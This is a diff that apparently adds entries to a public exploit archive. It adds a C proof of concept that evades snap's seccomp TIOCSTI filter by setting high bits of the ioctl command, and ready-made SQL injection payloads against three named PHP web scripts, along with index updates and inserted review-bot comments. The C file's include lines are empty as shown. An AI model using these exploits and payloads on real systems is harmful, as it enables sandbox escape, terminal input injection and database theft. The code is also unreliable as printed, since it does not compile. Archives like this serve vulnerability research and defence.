diff --git a/exploits/linux/dos/46594.c b/exploits/linux/dos/46594.c
new file mode 100644
index 000000000..86badd7e7
--- /dev/null
+++ b/exploits/linux/dos/46594.c
@@ -0,0 +1,78 @@
+/*
+snap uses a seccomp filter to prevent the use of the TIOCSTI ioctl; in the
+source code, this filter is expressed as follows:
+
+ # TIOCSTI allows for faking input (man tty_ioctl)
+ # TODO: this should be scaled back even more
+ ioctl - !TIOCSTI
+
+In the X86-64 version of the compiled seccomp filter, this results in the
+following BPF bytecode:
+
+ [...]
+ 0139 if nr == 0x00000010: [true +0, false +3]
+ 013b if args[1].high != 0x00000000: [true +205, false +0] -> ret ALLOW (syscalls: ioctl)
+ 0299 if args[1].low == 0x00005412: [true +111, false +112] -> ret ERRNO
+ 030a ret ALLOW (syscalls: ioctl)
+ [...]
+
+This bytecode performs a 64-bit comparison; however, the syscall entry point for
+ioctl() is defined with a 32-bit command argument in the kernel:
+
+SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
+{
+ return ksys_ioctl(fd, cmd, arg);
+}
+
+This means that setting a bit in the high half of the command parameter will
+circumvent the seccomp filter while being ignored by the kernel.
+
+This can be tested as follows on Ubuntu 18.04. You might have to launch the
+GNOME calculator once first to create the snap directory hierarchy, I'm not
+sure.
+
+====================================================================
+user@ubuntu-18-04-vm:~$ cat tiocsti.c
+*/
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+
+static int ioctl64(int fd, unsigned long nr, void *arg) {
+ errno = 0;
+ return syscall(__NR_ioctl, fd, nr, arg);
+}
+
+int main(void) {
+ int res;
+ char pushmeback = '#';
+ res = ioctl64(0, TIOCSTI, &pushmeback);
+ printf("normal TIOCSTI: %d (%m)\n", res);
+ res = ioctl64(0, TIOCSTI | (1UL<<32), &pushmeback);
+ printf("high-bit-set TIOCSTI: %d (%m)\n", res);
+}
+
+/*
+user@ubuntu-18-04-vm:~$ gcc -o tiocsti tiocsti.c -Wall
+user@ubuntu-18-04-vm:~$ ./tiocsti
+#normal TIOCSTI: 0 (Success)
+#high-bit-set TIOCSTI: 0 (Success)
+user@ubuntu-18-04-vm:~$ ##
+user@ubuntu-18-04-vm:~$ cp tiocsti /home/user/snap/gnome-calculator/current/tiocsti
+user@ubuntu-18-04-vm:~$ snap run --shell gnome-calculator
+[...]
+user@ubuntu-18-04-vm:/home/user$ cd
+user@ubuntu-18-04-vm:~$ ./tiocsti
+normal TIOCSTI: -1 (Operation not permitted)
+#high-bit-set TIOCSTI: 0 (Success)
+user@ubuntu-18-04-vm:~$ #
+user@ubuntu-18-04-vm:~$ pwd
+/home/user/snap/gnome-calculator/260
+user@ubuntu-18-04-vm:~$
+====================================================================
+*/
\ No newline at end of file
diff --git a/exploits/php/webapps/46591.txt b/exploits/php/webapps/46591.txt
new file mode 100644
index 000000000..e712057fd
--- /dev/null
+++ b/exploits/php/webapps/46591.txt
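Review bot: The six `#include` directives between `#define _GNU_SOURCE` and `ioctl64` carry no header names in this hunk, so the file as shown does not compile; if the angle-bracketed names were lost when the file was captured they should be restored, since `errno`, `printf`, `syscall`, `__NR_ioctl` and `TIOCSTI` need at least `<errno.h>`, `<stdio.h>`, `<unistd.h>`, `<sys/syscall.h>` and `<sys/ioctl.h>`. The header comment explains the root cause well — the filter compares all 64 bits of `args[1]` while the kernel's `SYSCALL_DEFINE3(ioctl, ...)` takes `cmd` as `unsigned int` — but stops short of the defensive conclusion a reader of this archive will want: a seccomp rule that denies an ioctl command must compare only `args[1].low` (or mask the high half), and the same holds for any rule on a syscall argument the kernel declares narrower than 64 bits. I would add one line to that comment, e.g. `Mitigation: the filter must match only the low 32 bits of cmd, because the kernel truncates it to unsigned int.`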
@@ -0,0 +1,43 @@
+# Exploit Title: Matrimony Website Script - Multiple SQL Injection
+# Date: 22.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.matri4web.com
+# Demo Site: https://www.matrimonydemo.com
+# Version: M-Plus
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/simplesearch_results.php
+Vulnerable Parameter: txtGender (POST)
+Attack Pattern:
+Fage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/advsearch_results.php
+Vulnerable Parameter: religion (POST)
+Attack Pattern:
+age1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo
+
+----- PoC 3 - SQLi -----
+
+Request: http://localhost/[PATH]/specialcase_results.php
+Vulnerable Parameter: Fage
+Attack Pattern:
+Fage=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&Tage=18&caste=Any&religion=Any&sp_cs=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo&txtprofile=7
+
+----- PoC 4 - SQLi -----
+
+Request: http://localhost/[PATH]/locational_results.php
+Vulnerable Parameter: cboCountry (POST)
+Attack Pattern:
+Fage=18&Tage=18&cboCountry=-1'%20OR%203*2*1=6%20AND%20000567=000567%20--%20&cboState=Any&city=Any&submit=Submit&txtCountry=Argentina&txtCountryLength=9&txtGender=Male&txtNumCountries=251&txtNumStates=25&txtSelectedCountry=9&txtSelectedState=10&txtState=Entre%20Rios&txtStateLength=10&txtphoto=Show%20profiles%20with%20Photo
+
+----- PoC 5 - SQLi -----
+
+Request: http://localhost/[PATH]/registration2.php
+Vulnerable Parameter: religion (POST)
+Attack Pattern:
+EMAILconfirm=sample%40email.tst&Language=&dobDay=&dobMonth=&dobYear=&religion=-1'%20OR%203*2*1=6%20AND%20000830=000830%20--%20&submit=Submit&txtAccept=I%20Accept%20%20the%20Terms%20and%20Conditions&txtGender=Male&txtMC=&txtMobile=987-65-4329&txtName=FtkKDgHs&txtPC=Self&txtcp=1
\ No newline at end of file
diff --git a/exploits/php/webapps/46592.txt b/exploits/php/webapps/46592.txt
new file mode 100644
index 000000000..97a13a641
--- /dev/null
+++ b/exploits/php/webapps/46592.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection
+# Date: 22.03.2019
+# Dork:
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: http://www.meeplace.com
+# Demo Site: http://demo.meeplace.com
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+# Request: http://localhost/[PATH]/ad/addclick.php?&id=1
+# Vulnerable Parameter: id (GET)
+# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)
\ No newline at end of file
diff --git a/exploits/php/webapps/46593.txt b/exploits/php/webapps/46593.txt
new file mode 100644
index 000000000..97e018422
--- /dev/null
+++ b/exploits/php/webapps/46593.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Inout Article Base CMS - SQL Injection
+# Date: 21.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.inoutscripts.com/products/inout-article-base/
+# Demo Site: http://www.inoutwebportal.com
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/articles/portalLogin.php
+Vulnerable Parameter: p (GET)
+Attack Pattern:
+http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=test
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/articles/portalLogin.php
+Vulnerable Parameter: u (GET)
+Attack Pattern:
+http://locahost/[PATH]/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=fe01ce2a7fbac8fafaed7c982a04e229&u=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index bc0cbf7ae..b4fb924ff 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6367,6 +6367,7 @@ id,file,description,date,author,type,platform,port
 46570,exploits/multiple/dos/46570.txt,"Google Chrome < M73 - MidiManagerWin Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
 46571,exploits/multiple/dos/46571.txt,"Google Chrome < M73 - FileSystemOperationRunner Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
 46589,exploits/windows/dos/46589.php,"Canarytokens 2019-03-01 - Detection Bypass",2019-03-21,"Gionathan Reale",dos,windows,
+46594,exploits/linux/dos/46594.c,"snap - seccomp BBlacklist for TIOCSTI can be Circumvented",2019-03-22,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41033,3 +41034,6 @@ id,file,description,date,author,type,platform,port
 46587,exploits/php/webapps/46587.txt,"uHotelBooking System - 'system_page' SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
 46588,exploits/php/webapps/46588.txt,"Placeto CMS Alpha v4 - 'page' SQL Injection",2019-03-21,"Abdullah Çelebi",webapps,php,80
 46590,exploits/php/webapps/46590.txt,"Bootstrapy CMS - Multiple SQL Injection",2019-03-21,"Ahmet Ümit BAYRAM",webapps,php,80
+46591,exploits/php/webapps/46591.txt,"Matri4Web Matrimony Website Script - Multiple SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
+46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
+46593,exploits/php/webapps/46593.txt,"Inout Article Base CMS - SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
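Review bot: The description field of the new 46594 row in the first hunk reads `snap - seccomp BBlacklist for TIOCSTI can be Circumvented`; `BBlacklist` has a doubled letter and should be `Blacklist`, since this string is what the index and search surface to users. The three rows added in the second hunk show no such problem.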